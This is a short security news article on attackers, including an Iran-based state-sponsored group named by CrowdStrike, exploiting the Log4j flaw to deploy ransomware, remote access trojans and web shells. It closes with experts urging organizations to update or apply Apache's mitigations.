Threat actors, including at least one nation-state actor, are attempting to exploit the newly disclosed Log4j flaw to deploy ransomware, remote access Trojans, and Web shells on vulnerable systems. All the while, organizations continue to download versions of the logging tool containing the vulnerability.
This new attack activity represents an escalation of sorts from attackers' initial exploitation attempts, which mainly focused on dropping cryptocurrency mining tools and compromising systems with the goal of adding them to a botnet. Targeted systems include servers, virtual machines, PCs, and IP cameras.
CrowdStrike on Tuesday said it has observed a nation-state actor make moves that suggest an interest in exploiting the flaw.
"CrowdStrike Intelligence has observed state-sponsored actor NEMESIS KITTEN -- based out of Iran -- newly deploy into a server a class file that could be triggered by Log4j," says Adam Meyers, senior vice president of intelligence at CrowdStrike. "The timing, intent, and capability are consistent with what would be the adversary attempting to exploit Log4j," he adds. Meyers describes NEMESIS KITTEN as an adversary that has previously been engaged in both disruptive and destructive attacks.
The latest developments heighten the urgency for organizations to update to the new version of the Log4j logging framework that the Apache Foundation released Dec. 10, or to apply the mitigations it has recommended, security experts said this week.